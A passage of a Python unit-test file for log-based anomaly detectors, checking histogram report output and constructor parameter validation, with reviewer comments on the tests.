        log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t1, histogram_analysis)
        match_element_end = MatchElement("match", str(end_time).encode(), end_time, None)
        log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t1 + diff, histogram_analysis)
        histogram_analysis.receive_atom(log_atom_start)
        histogram_analysis.receive_atom(log_atom_end)
        dtm = datetime.fromtimestamp(t1).strftime(datetime_format_string)
        dtm2 = datetime.fromtimestamp(t1 + diff).strftime(datetime_format_string)
        # NOTE(review): two concatenated reports are expected here; the first one is
        # textually identical to the report asserted in the previous section (same
        # dtm/dtm2 and bins).  Why it is emitted again is not visible in this test --
        # confirm against the analyzer / event-handler implementation.
        self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, histogram_analysis.__class__.__name__, 2, dtm, dtm2, 'Property "match" (2 elements):\n * [16-17]: 1 (ratio = 5.00e-01, p = 8.16e-02)\n * [17-18]: 1 (ratio = 5.00e-01, p = 8.16e-02)') + expected_string % (dtm2, histogram_analysis.__class__.__name__, 2, dtm, dtm2, 'Property "match" (2 elements):\n * [16-17]: 2 (ratio = 1.00e+00, p = 1.74e-03)'))
        self.reset_output_stream()
        t2 = t1 + diff
        start_time += 3600
        end_time += 3600
        log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t2, histogram_analysis)
        match_element_end = MatchElement("match", str(end_time).encode(), end_time, None)
        log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t2 + diff, histogram_analysis)
        histogram_analysis.receive_atom(log_atom_start)
        histogram_analysis.receive_atom(log_atom_end)
        dtm = datetime.fromtimestamp(t2).strftime(datetime_format_string)
        dtm2 = datetime.fromtimestamp(t2 + diff).strftime(datetime_format_string)
        # Accumulated: two earlier values in bin 16 plus bin 16 (start) and bin 17 (end).
        self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2,
                                                                           histogram_analysis.__class__.__name__, 4, dtm, dtm2, 'Property "match" (4 elements):\n * [16-17]: 3 (ratio = 7.50e-01, p = 2.80e-04)\n * [17-18]: 1 (ratio = 2.50e-01, p = 1.57e-01)'))

    def test5receive_atom_PathDependentHistogramAnalysis(self):
        """Test if reports on anomalies are generated correctly."""
        # Same scenario as test4, but for the path-dependent variant: the report body
        # additionally names the path and prints an "Example:" value.
        expected_string = '%s Histogram report\n%s: "None" (%d lines)\n Path histogram report from %s till %s\n%s\n\n'
        datetime_format_string = "%Y-%m-%d %H:%M:%S"
        t = time.time()
        # test the functionality of the HistogramAnalysis, when NO report is expected
        # diff = 30000 stays below the 604800 passed as fourth argument, so no output
        # may appear, also after advancing the atom times by diff once more.
        start_time = 57600
        end_time = 662600
        diff = 30000
        mtbd = ModuloTimeBinDefinition(86400, 3600, 0, 1, 24, False)
        histogram_data = HistogramData("match", mtbd)
        pdha = PathDependentHistogramAnalysis(self.aminer_config, histogram_data.property_path, mtbd, 604800, [self.stream_printer_event_handler], True)
        match_element_start = MatchElement("match", str(start_time).encode(), start_time, None)
        log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t, pdha)
        match_element_end = MatchElement("match", str(end_time).encode(), end_time, None)
        log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t + diff, pdha)
        pdha.receive_atom(log_atom_start)
        pdha.receive_atom(log_atom_end)
        self.assertEqual(self.output_stream.getvalue(), "")
        log_atom_start.atom_time += diff
        log_atom_end.atom_time += diff
        pdha.receive_atom(log_atom_start)
        pdha.receive_atom(log_atom_end)
        self.assertEqual(self.output_stream.getvalue(), "")
        # test the functionality of the HistogramAnalysis, when a report is expected.
start_time = 57600
        end_time = 662600
        diff = 605000  # exceeds the 604800 s window -> a report is expected
        # NOTE(review): pdha is built from histogram_data.property_path and mtbd only, so
        # this reset() does not appear to influence the analyzer's state -- confirm.
        histogram_data.reset()
        pdha = PathDependentHistogramAnalysis(self.aminer_config, histogram_data.property_path, mtbd, 604800, [self.stream_printer_event_handler], True)
        match_element_start = MatchElement("match", str(start_time).encode(), start_time, None)
        log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t, pdha)
        match_element_end = MatchElement("match", str(end_time).encode(), end_time, None)
        log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t + diff, pdha)
        pdha.receive_atom(log_atom_start)
        pdha.receive_atom(log_atom_end)
        dtm = datetime.fromtimestamp(t).strftime(datetime_format_string)
        dtm2 = datetime.fromtimestamp(t + diff).strftime(datetime_format_string)
        # The "Example:" line carries the end element's parsed value (662600); both
        # values fall into bin 16.
        self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, pdha.__class__.__name__, 2, dtm, dtm2, 'Path values "match":\nExample: 662600\n Property "match" (2 elements):\n * [16-17]: 2 (ratio = 1.00e+00, p = 1.74e-03)'))
        self.reset_output_stream()
        t1 = t + diff
        start_time += 3600
        end_time += 3600
        # Only the end element is rebuilt (666200 -> bin 17); the start atom reuses
        # match_element_start (57600 -> bin 16).
        log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t1, pdha)
        match_element_end = MatchElement("match", str(end_time).encode(), end_time, None)
        log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t1 + diff, pdha)
        pdha.receive_atom(log_atom_start)
        pdha.receive_atom(log_atom_end)
        dtm = datetime.fromtimestamp(t1).strftime(datetime_format_string)
        dtm2 = datetime.fromtimestamp(t1 + diff).strftime(datetime_format_string)
        self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, pdha.__class__.__name__, 2, dtm, dtm2, 'Path values "match":\nExample: 666200\n Property "match" (2 elements):\n * [16-17]: 1 (ratio = 5.00e-01, p = 8.16e-02)\n * [17-18]: 1 (ratio = 5.00e-01, p = 8.16e-02)'))
        # reset_after_report_flag = False
        # Without the reset the counts of consecutive reports accumulate (2 + 2 = 4 below).
        start_time = 57600
        end_time = 662600
        diff = 605000
        histogram_data.reset()
        pdha = PathDependentHistogramAnalysis(self.aminer_config, histogram_data.property_path, mtbd, 604800, [self.stream_printer_event_handler], reset_after_report_flag=False)
        match_element_start = MatchElement("match", str(start_time).encode(), start_time, None)
        log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t1, pdha)
        match_element_end = MatchElement("match", str(end_time).encode(), end_time, None)
        log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t1 + diff, pdha)
        pdha.receive_atom(log_atom_start)
        pdha.receive_atom(log_atom_end)
        dtm = datetime.fromtimestamp(t1).strftime(datetime_format_string)
        dtm2 = datetime.fromtimestamp(t1 + diff).strftime(datetime_format_string)
        # NOTE(review): as in test4, the first of the two concatenated reports repeats
        # the previous section's report text; the reason is not visible here -- confirm.
        self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, pdha.__class__.__name__, 2, dtm, dtm2, 'Path values "match":\nExample: 666200\n Property "match" (2 elements):\n * [16-17]: 1 (ratio = 5.00e-01, p = 8.16e-02)\n * [17-18]: 1 (ratio = 5.00e-01, p = 8.16e-02)') + expected_string % (dtm2, pdha.__class__.__name__, 2, dtm, dtm2, 'Path values "match":\nExample: 662600\n Property "match" (2 elements):\n * [16-17]: 2 (ratio = 1.00e+00, p = 1.74e-03)'))
        self.reset_output_stream()
        t2 = t1 + diff
        start_time += 3600
        end_time += 3600
        log_atom_start = LogAtom(match_element_start.match_string, ParserMatch(match_element_start), t2, pdha)
        match_element_end = MatchElement("match", str(end_time).encode(), end_time, None)
        log_atom_end = LogAtom(match_element_end.match_string, ParserMatch(match_element_end), t2 + diff, pdha)
        pdha.receive_atom(log_atom_start)
        pdha.receive_atom(log_atom_end)
        dtm = datetime.fromtimestamp(t2).strftime(datetime_format_string)
        dtm2 = datetime.fromtimestamp(t2 + diff).strftime(datetime_format_string)
        # Accumulated: two earlier values in bin 16 plus bin 16 (start) and bin 17 (end).
        self.assertEqual(self.output_stream.getvalue(), expected_string % (dtm2, pdha.__class__.__name__, 4, dtm, dtm2, 'Path values "match":\nExample: 666200\n Property "match" (4 elements):\n * [16-17]: 3 (ratio = 7.50e-01, p = 2.80e-04)\n * [17-18]: 1 (ratio = 2.50e-01, p = 1.57e-01)'))

    def test6validate_parameters(self):
        """Test all initialization parameters for the detector. Input parameters must be validated in the class."""
        # Each argument position is probed with wrong types (str, bytes, list, dict, set,
        # bool, tuple, None) and out-of-range values.  Constructor-time validation is what
        # keeps a malformed analyzer configuration from surfacing later as an obscure
        # runtime failure.
        #
        # LinearNumericBinDefinition(a, b, c, d), as pinned by the assertions: a accepts
        # int and float (negative allowed, see -100 and 100.3 below) but rejects bool even
        # though bool subclasses int; b and c must be positive ints (0 / -1 -> ValueError,
        # float / bool -> TypeError); d must be a bool.
        self.assertRaises(TypeError, LinearNumericBinDefinition, "0", 1, 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, b"0", 1, 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, [0], 1, 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, {0: 0}, 1, 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, set(), 1, 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, True, 1, 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, (0,), 1, 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, None, 1, 1, True)
        self.assertRaises(ValueError, LinearNumericBinDefinition, 1, -1, 1, True)
        self.assertRaises(ValueError, LinearNumericBinDefinition, 1, 0, 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1.1, 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, True, 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, "1", 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, b"1", 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, [1], 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, {1: 1}, 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, set(), 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, (1,), 1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, None, 1, True)
        self.assertRaises(ValueError, LinearNumericBinDefinition, 1, 1, -1, True)
        self.assertRaises(ValueError, LinearNumericBinDefinition, 1, 1, 0, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1.1, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, True, True)
        self.assertRaises(TypeError,
LinearNumericBinDefinition, 1, 1, "1", True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, b"1", True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, [1], True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, {1: 1}, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, set(), True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, (1,), True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, None, True)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, 1)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, 1.1)
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, "1")
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, b"1")
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, [1])
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, {1: 1})
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, set())
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, (1,))
        self.assertRaises(TypeError, LinearNumericBinDefinition, 1, 1, 1, None)
        # Valid constructions: negative, zero, positive and float first argument.
        LinearNumericBinDefinition(-100, 1, 1, True)
        lnbd = LinearNumericBinDefinition(0, 1, 1, False)
        LinearNumericBinDefinition(100, 1, 1, False)
        LinearNumericBinDefinition(100.3, 1, 1, False)
        # ModuloTimeBinDefinition(a, b, c, d, e, f), as pinned by the assertions: a is a
        # positive number (0.1 accepted; 0 / -1 -> ValueError; bool -> TypeError); b, d
        # and e are positive ints; c is a non-negative number (0, 100 and 100.3 accepted,
        # -1 -> ValueError); f is a bool.
        self.assertRaises(ValueError, ModuloTimeBinDefinition, 0, 3600, 1, 1, 1, True)
        self.assertRaises(ValueError, ModuloTimeBinDefinition, -1, 3600, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, True, 3600, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, "1", 3600, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, b"1", 3600, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, [1], 3600, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, {1: 1}, 3600, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, set(), 3600, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, (1,), 3600, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, None, 3600, 1, 1, 1, True)
        self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 0, 1, 1, 1, True)
        self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, -1, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 1.1, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, True, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, "1", 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, b"1", 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, [1], 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, {1: 1}, 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, set(), 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, (1,), 1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, None, 1, 1, 1, True)
        self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 3600, -1, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, "0", 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, b"0", 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, [0], 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, {0: 0}, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, set(), 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, True, 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, (0,), 1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, None, 1, 1, True)
        self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 3600, 1, -1, 1, True)
        self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 3600, 1, 0, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1.1, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, True, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, "1", 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, b"1", 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, [1], 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, {1: 1}, 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, set(), 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, (1,), 1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, None, 1, True)
        self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, -1, True)
        self.assertRaises(ValueError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 0, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1.1, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, True, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, "1", True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, b"1", True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, [1], True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, {1: 1}, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, set(), True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, (1,), True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, None, True)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, 1)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, 1.1)
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, "1")
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, b"1")
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, [1])
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, {1: 1})
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, set())
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, (1,))
        self.assertRaises(TypeError, ModuloTimeBinDefinition, 86400, 3600, 1, 1, 1, None)
        # Valid constructions: float first argument, int and float third argument.
        ModuloTimeBinDefinition(0.1, 1, 0, 1, 1, True)
        mtbd = ModuloTimeBinDefinition(86400, 3600, 100, 1, 1, False)
        ModuloTimeBinDefinition(86400, 3600, 100.3, 1, 1, False)
        # HistogramData(path, bin_definition): the path must be a non-empty str ("" ->
        # ValueError, any non-str -> TypeError); the bin definition must be a bin
        # definition object -- both the modulo and the linear variant are accepted.
        self.assertRaises(ValueError, HistogramData, "", mtbd)
        self.assertRaises(TypeError, HistogramData, None, mtbd)
        self.assertRaises(TypeError, HistogramData, 1, mtbd)
        self.assertRaises(TypeError, HistogramData, 1.1, mtbd)
        self.assertRaises(TypeError, HistogramData, True, mtbd)
        self.assertRaises(TypeError, HistogramData, b"match", mtbd)
        self.assertRaises(TypeError, HistogramData, [1], mtbd)
        self.assertRaises(TypeError, HistogramData, {1: 1}, mtbd)
        self.assertRaises(TypeError, HistogramData, set(), mtbd)
        self.assertRaises(TypeError, HistogramData, (1,), mtbd)
        self.assertRaises(TypeError, HistogramData, "match", None)
        self.assertRaises(TypeError, HistogramData, "match", 1)
        self.assertRaises(TypeError, HistogramData, "match", 1.1)
        self.assertRaises(TypeError, HistogramData, "match", True)
        self.assertRaises(TypeError, HistogramData, "match", b"match")
        self.assertRaises(TypeError, HistogramData, "match", [1])
        self.assertRaises(TypeError, HistogramData, "match", {1: 1})
        self.assertRaises(TypeError, HistogramData, "match", set())
        self.assertRaises(TypeError, HistogramData, "match", (1,))
        HistogramData("match", mtbd)
        HistogramData("match", lnbd)
        # HistogramAnalysis(config, defs, interval, handlers, ...): defs must be a
        # non-empty list of (non-empty str, bin definition) tuples; the third argument
        # must be an int (float / bool / str -> TypeError); the fourth a list of handlers.
        defs = [("path", mtbd)]
        self.assertRaises(ValueError, HistogramAnalysis, self.aminer_config, [], 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, [("path", "path")], 100, [self.stream_printer_event_handler])
        self.assertRaises(ValueError, HistogramAnalysis, self.aminer_config, [("", mtbd)], 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, ["default"], 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, b"Default", 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, True, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, 123, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, 123.3, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, {"id": "Default"}, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, (), 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, set(), 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, None, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, ["default"], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, None, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, "", [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, b"Default", [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, True, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100.1, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, {"id": "Default"}, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, (), [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, set(), [self.stream_printer_event_handler])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, ["default"])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, None)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, "")
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, b"Default")
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, True)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, 123)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, 123.3)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, {"id": "Default"})
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, ())
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, set())
        # reset_after_report_flag and output_logline must be bool (None is rejected too).
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=["default"])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=None)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag="")
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=b"Default")
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=123)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=123.3)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag={"id": "Default"})
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=())
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], reset_after_report_flag=set())
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=["default"])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=None)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline="")
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=b"Default")
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=123)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=123.3)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline={"id": "Default"})
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=())
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], output_logline=set())
        # log_resource_ignore_list must be a list of resource URLs: the bare filesystem
        # path "/tmp/syslog" is rejected with ValueError, "file:///tmp/syslog" is accepted;
        # any non-list value is a TypeError.
        self.assertRaises(ValueError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"])
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list="")
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=b"Default")
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=True)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=123)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=123.22)
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"})
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=())
        self.assertRaises(TypeError, HistogramAnalysis, self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=set())
        HistogramAnalysis(self.aminer_config, defs, 100, [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"])
        # PathDependentHistogramAnalysis(config, path, bin_definition, interval, handlers, ...):
        # the path must be a non-empty str; the remaining checks mirror HistogramAnalysis.
        self.assertRaises(ValueError, PathDependentHistogramAnalysis, self.aminer_config, "", mtbd, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, b"path", mtbd, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, ["default"], mtbd, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, b"Default", mtbd, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, True, mtbd, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, 123, mtbd, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, 123.3, mtbd, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, {"id": "Default"}, mtbd, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, (), mtbd, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, set(), mtbd, 100, [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, None, mtbd, 100, [self.stream_printer_event_handler])
        # NOTE(review): the nine bin-definition checks below also pass ["default"] as the
        # fourth argument, which on its own already raises TypeError (see the
        # `"path", mtbd, ["default"]` assertion further down).  As written they do not
        # prove that the bin definition is validated; passing 100 there would isolate
        # the argument under test -- confirm the class validates it before changing.
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", [mtbd], ["default"], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", b"path", ["default"], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", "", ["default"], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", True, ["default"], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", 123.3, ["default"], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", {"id": "Default"}, ["default"], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", (), ["default"], [self.stream_printer_event_handler])
        self.assertRaises(TypeError, PathDependentHistogramAnalysis, self.aminer_config, "path", set(), ["default"], [self.stream_printer_event_handler])
